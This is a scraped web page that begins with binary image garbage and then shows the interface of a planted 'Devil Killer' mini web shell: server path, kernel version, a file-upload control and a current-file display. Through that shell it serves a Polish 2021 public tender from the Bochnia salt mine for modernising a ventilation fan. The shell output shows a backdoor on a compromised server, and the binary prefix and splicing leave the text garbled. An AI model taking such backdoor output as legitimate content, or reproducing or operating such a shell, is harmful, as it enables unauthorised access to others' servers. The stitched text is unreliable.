JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210423/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210423/0003916701-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00039167 z dnia 2021-04-23</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> 4/2021/EZ </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Kopalnia Soli Bochnia sp. z o. o.</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000867845</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Campi 15</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Bochnia</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">32-700</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL214 - Krakowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48146152402</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">+48146124718</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@kopalnia-bochnia.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.kopalnia-bochnia.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - związki podmiotów, o których mowa w art. 4 pkt 1 lub 2 ustawy lub podmiotów, o których mowa w art. 4 pkt. 3 ustawy</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> pozostałe górnictwo i wydobywanie </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> 4/2021/EZ </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-46fb3fa9-a403-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00039167</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-04-23</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.kopalnia-bochnia.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://kopalniabochnia.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W przedmiotowym postępowaniu o udzielenie zamówienia publicznego oświadczenia, wnioski,zawiadomienia oraz informacje Zamawiający i Wykonawcy przekazują elektronicznie zapośrednictwem strony internetowej postępowania znajdującej się pod adresem: https://kopalniabochnia.ezamawiajacy.pl w zakładce „Korespondencja”.2. Oświadczenia, wnioski, zawiadomienia lubinformacje, które wpłyną do Zamawiającego, uważa się za dokumenty złożone w terminie, jeśli ichczytelna treść dotrze do Zamawiającego. Za datę wpływu oświadczeń, wniosków, zawiadomień orazinformacji przyjmuje się datę ich złożenia/wysłania na Platformie.3. Szczegółowe warunki korzystania zPlatformy zawarte są na stronie https://kopalnia-bochnia.ezamawiajacy.pl w zakładce „Baza wiedzy”,która jest dostępna dla zalogowanych Wykonawców.4. Zamawiający wskazuje informacje, o którychmowa w Rozporządzenia Prezesa Rady Ministrów w sprawie użycia środków komunikacjielektronicznej w postępowaniu o udzielenie zamówienia publicznego oraz udostępnienia iprzechowywania dokumentów elektronicznych, dotyczące systemu dostępnego pod adresemhttps://kopalnia-bochnia.ezamawiajacy.pl:1) komputer PC/MAC z aktualnym systemem operacyjnymwspieranym przez producenta2) Wybrana przeglądarka wspierana przez producenta: MS InternetExplorer, Firefox, Google Chrome lub MS Edge3)Podłączenie do Internetu: min. 512 Kb/s na komputer(zalecane szerokopasmowe łącze internetowe).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Zamawiający wymaga złożenia oferty w postaci katalogu elektronicznego</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zamawiający informuje zgodnie z art. 13 ust. 1 i 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (Ogólne rozporządzenie o ochroniedanych lub „RODO”):1) Administratorem danych osobowych jest Kopalnia Soli Bochnia sp. z o. o., ul.Campi 15, 32-700 Bochnia.2) Przestrzeganie zasad ochrony danych w Kopalnia Soli Bochnia sp. z o.o., ul. Campi 15, 32-700 Bochnia nadzoruje wyznaczony Inspektor Ochrony Danych, z którym możnaskontaktować pod adresem email: iod@kopalnia-bochnia.pl3) Dane osobowe przetwarzane będą napodstawie: a) art. 6 ust. 1 lit. b RODO – podjęcie działań na żądanie osoby, której dane dotyczą, przedzawarciem umowy, poprzez wzięcie udziału w postępowaniu organizowanym przez Administratoradanych, a także przetwarzanie jest niezbędne do wykonania zawartej z wybranym Wykonawcą umowyo zamówienie publiczne. b) art. 6 ust. 1 lit. c RODO – wypełnienie obowiązku prawnego wynikającego zustawy i przepisów wykonawczych do ustawy, w zakresie dokumentów jakie może żądać Zamawiającyod Wykonawców.4) Odbiorcami danych osobowych będą upoważnieni pracownicy Zamawiającego,podmioty przetwarzające działające na podstawie umowy z administratorem i wyłącznie zgodnie zpoleceniami administratora, oraz inne podmioty którym dane będą udostępnione na podstawieprzepisów prawa, w tym w szczególności osoby lub podmioty posiadające dostęp do dokumentacjipostępowania zgodnie z art. 18 lub art. 74 ustawy.5) Przetwarzane dane osobowe nie będąprzekazywane do państwa trzeciego (tj. państwa nienależącego do Europejskiego ObszaruGospodarczego) i/lub organizacji międzynarodowej.6) Dane osobowe będą przechowywane przezokres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli okres obowiązywaniaumowy w sprawie zamówienia publicznego przekracza 4 lata – przez cały ten okres, a następnie doupływu terminów określonych w przepisach prawa podatkowego, terminów przedawnienia roszczeńwynikających z zawartej umowy lub terminu przechowywania dokumentacji wynikającej zobowiązującej u Zamawiającego Instrukcji Archiwalnej, w zależności od tego, który z tych terminównastąpi najpóźniej.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">1) Z zastrzeżeniem ograniczeń wynikających z ustawy orazRODO, osobie, której dane dotyczą przysługują następujące prawa: a) dostępu do treści danych (art.15 RODO);b) do sprostowania danych (art. 16 RODO);c) do ograniczenia przetwarzania danych (art.18 RODO);d) do wniesienia skargi do organu nadzorczego (Prezesa Urzędu Ochrony DanychOsobowych) w przypadku uznania, że przetwarzanie danych osobowych narusza przepisy RODO.2)Osobie, której dane dotyczą nie przysługują następujące prawa:a) do usunięcia danych (art. 17RODO), z uwagi na treść art. 17 ust. 3 lit. b), d) lub e) RODO,b) do przenoszenia danych (art. 20RODO), gdyż przetwarzanie nie będzie odbywało się w sposób zautomatyzowany,c) do wniesieniasprzeciwu (art. 21 RODO), gdyż przetwarzanie nie odbywa się na podstawie art. 6 ust. 1 lit. e) lub f)RODO.3) Obowiązek podania danych osobowych jest wymogiem ustawowym określonym wprzepisach ustawy, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego;konsekwencje niepodania określonych danych wynikają z przepisów ustawy. 4) W odniesieniu dopodanych danych decyzje nie będą podejmowane w sposób zautomatyzowany.Zamawiający informuje,że zgodnie z art. 19 ust. 2 ustawy skorzystanie przez osobę, której dane osobowe dotyczą, zuprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16 RODO, nie może skutkowaćzmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawiezamówienia publicznego w zakresie niezgodnym z ustawą.Zamawiający informuje, że w postępowaniuo udzielenia zamówienia zgłoszenie żądania, o którym mowa w art. 18 ust. 1 RODO, nie ograniczaprzetwarzania danych osobowych do czasu zakończenia tego postępowania.W przypadku wskazaniaw treści dokumentów zamówienia danych osobowych osób trzecich, Wykonawca jest zobowiązany dozłożenia oświadczenia o wykonaniu wobec tych osób obowiązku wynikającego z art. 13 lub art. 14RODO.Zamawiający udostępnia dane osobowe, o których mowa w art. 10 RODO, w celu umożliwieniakorzystania ze środków ochrony prawnej, o których mowa w dziale IX ustawy, wyłącznie do upływuterminu na ich wniesienie.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1)	Optymalizacja pracy wentylatora.2)	Modernizacja części elektrycznej wentylatora.3)	Zakładane efekty modernizacji wentylatora WOK-2j:a.	wydajność optymalnej pracy; ok. 1200 m3/min,b.	wydajność maksymalna pracy: minimum 1500 m3/min,c.	wydajność minimalna pracy: maksymalnie 800 m3/min.4)	Określenie nowych charakterystyk pracy wentylatora po wykonanej modernizacji.5)	Przygotowanie dokumentacji koniecznej do wykonania modernizacji na obiekcie Zamawiającego i odbioru technicznego przez właściwe organy nadzoru górniczego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50530000-9 - Usługi w zakresie napraw i konserwacji maszyn</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">98 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja na wykonaną modernizację</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:1)	zdolności do występowania w obrocie gospodarczym – wpis do jednego z rejestrów zawodowych lub handlowych prowadzonych w kraju, w którym mają siedzibę lub miejsce zamieszkania;2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów – Zamawiający nie wyznacza warunku w tym zakresie;3)	sytuacji ekonomicznej lub finansowej – Zamawiający nie wyznacza warunku, w tym zakresie;4)	zdolności technicznej lub zawodowej:a.	udokumentowanie wykonania w okresie ostatnich 3 lat, przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie co najmniej jednego montażu/modernizacji/wymiany wentylatora głównego przewietrzania w ruchu zakładu górniczego o wartości co najmniej 100 000,00 zł netto,b.	udokumentowanie, że bieżący dozór robót sprawowany będzie przez osoby posiadające kwalifikacje do wykonywania czynności osoby dozoru ruchu w specjalności mechanicznej i elektrycznej w wyrobiskach podziemnych zakładu, o którym mowa w art. 2 ust. 1 pkt. 2 lub 5 ustawy Prawo geologiczne i górnicze, dopuszcza się osobę, która posiada stwierdzone kwalifikacje do wykonywania czynności dozoru ruchu mechanicznego i elektrycznego w kopalniach wydobywających kopaliny inne niż węgiel kamienny (co najmniej po jednej osobie). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Dokument potwierdzającego wpis do jednego z rejestrów zawodowych lubhandlowych prowadzonych w kraju, w którym mają siedzibę lub miejsce zamieszkania, sporządzonegonie wcześniej niż 6 miesięcy przed jego złożeniem</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)	w odniesieniu do zdolności do występowania w obrocie gospodarczym – w zakresie wykonawców prowadzących działalność gospodarczą:a)	dokumentu potwierdzającego wpis do jednego z rejestrów zawodowych lub handlowych prowadzonych w kraju, w którym mają siedzibę lub miejsce zamieszkania, sporządzonego nie wcześniej niż 6 miesięcy przed jego złożeniem;2)	w odniesieniu do zdolności technicznej lub zawodowej Wykonawcy:a)	wykazu wykonanego w okresie ostatnich 3 lat, przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie co najmniej jednej usługi dotyczącej montażu/modernizacji/wymiany wentylatora głównego przewietrzania w ruchu zakładu górniczego, o wartości co najmniej 100 000,00 zł netto wraz z podaniem, wartości, daty, miejsca wykonywanego montażu/modernizacji/wymiany i podmiotu, na rzecz, którego montaż/modernizacja/wymiana ta została wykonana, z załączeniem dowodów określających czy ten montaż/modernizacja/wymiana została wykonana należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego montaż/modernizacja/wymiana była wykonywana, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów – inne dokumenty.Wzór wykazu stanowi Załącznik Nr 5 do SWZ;b)	wykazu osób, skierowanych przez Wykonawcę do realizacji przedmiotowego zamówienia, zawierającego informacje na temat ich kwalifikacji zawodowych niezbędnych do wykonania zamówienia, a także informację o podstawie do dysponowania tymi osobami.Wzór wykazu stanowi Załącznik Nr 6 do SWZ.3)	w odniesieniu do braku podstaw wykluczenia:a)	oświadczenie potwierdzające aktualność informacji zawartych w oświadczeniach składanych na podstawie art. 125 ust 1 ustawy w zakresie podstaw wykluczenia wskazanych przez Zamawiającego. Wzór oświadczenia stanowi Załącznik Nr 3 do SWZ;</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wadium należy wnieść przed upływem terminu składania ofert, określonym w części XVII pkt 1 niniejszej specyfikacji. 2.	Zamawiający wymaga wniesienia wadium w wysokości 5 000,00 zł.3.	Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy:PKO SA Oddział Bochnia nr: 71 1240 5208 1111 0000 5478 3162 z dopiskiem: wadium w sprawie przetargu 4/2021/EZ 4.	Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania rachunku Zamawiającego. 5.	Nie dopuszcza się wpłaty wadium w kasie Kopalni Soli Bochnia sp. z o. o. 6.	W przypadku złożenia wadium w innej formie niż pieniężna, oryginał dokumentu wadium (poręczenia lub gwarancji) opatrzonego kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym osób upoważnionych do jego wystawienia, Wykonawca składa wraz z ofertą załączając na Platformie w zakładce „OFERTY” – poprzez wybranie polecenia „dodaj dokument". 7.	Wadium złożone w innej formie niż pieniężna musi obejmować okres od dnia składania ofert do dnia upływu terminu związania ofertą określonego w rozdziale XIV pkt. 1.8.	Zamawiający, zgodnie z art. 98 ust 6 pkt 1 ustawy zatrzymuje wadium w przypadku gdy wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 107 ust. 2 lub art. 128 ust. 1 ustawy, z przyczyn leżących po jego stronie, nie złożył podmiotowych środków dowodowych lub przedmiotowych środków dowodowych potwierdzających okoliczności, o których mowa w art. 57 lub art. 106 ust. 1 ustawy, oświadczenia, o którym mowa w art. 125 ust. 1 ustawy, innych dokumentów lub oświadczeń lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 223 ust. 2 pkt 3 ustawy, co spowodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej.9.	Zamawiający zgodnie z art. 98 ust. 6 pkt 2, 3 ustawy zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:1)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,2)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;3)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy, którego oferta została wybrana.10.	Oferta Wykonawcy, który nie wniósł wadium, lub wniósł w sposób nieprawidłowy lub nie utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą lub złożył wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 ustawy , zostanie odrzucona na podstawie art. 226 ust. 1 pkt 14 ustawy.11.	Zgodnie z treścią art. 98 ust. 1 ustawy Pzp Zamawiający zwraca wadium Wykonawcy niezwłocznie, nie później niż w terminie 7 dni od dnia wystąpienia jednej z okoliczności:1)	upływu terminu związania ofertą. 2)	zawarcia umowy w sprawie zamówienia publicznego, 3)	unieważnienia postępowania o udzielenie zamówienia, z wyjątkiem sytuacji gdy nie zostało rozstrzygnięte odwołanie na czynności unieważnienia albo nie upłynął termin do jego wniesienia.12.	Zgodnie z treścią art. 98 ust. 2 ustawy Pzp Zamawiający, niezwłocznie, nie później jednak niż w terminie 7 dni od dnia złożenia wniosku zwraca wadium Wykonawcy:1)	który wycofał ofertę przed upływem terminu składania ofert,2)	którego oferta została odrzucona, 3)	po wyborze najkorzystniejszej oferty, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, 4)	po unieważnieniu postępowania, w przypadku gdy nie zostało rozstrzygnięte odwołanie na czynności unieważnienia albo nie upłynął termin do jego wniesienia.13.	Złożenie wniosku o zwrot wadium, o którym mowa w pkt. 9 powoduje rozwiązanie stosunku prawnego z Wykonawcą wraz z utratą przez niego prawa do korzystania ze środków ochrony prawnej, o których mowa w dziale IX ustawy. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Zgodnie z brzmieniem art. 58 ust. 1 ustawy Wykonawcy mogą wspólnie ubiegać się o udzieleniezamówienia (np. wspólnicy spółki cywilnej, członkowie konsorcjum).1) Wykonawcy wspólnieubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich wpostępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarciaumowy w sprawie zamówienia publicznego (art. 58 ust. 2 ustawy).W związku z powyższym,Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego są zobowiązanidołączyć do oferty pełnomocnictwo ustanawiające pełnomocnika, o którym mowa w art. 58 ust. 2ustawy. Pełnomocnictwo winno być załączone w oryginale w postaci elektronicznej, podpisanekwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym lub jako jego cyfrowe odwzorowanie opatrzone kwalifikowalnym podpisem elektronicznym,podpisem zaufanym lub podpisem osobistym przez mocodawcę lub notariusza, poświadczającezgodność cyfrowego 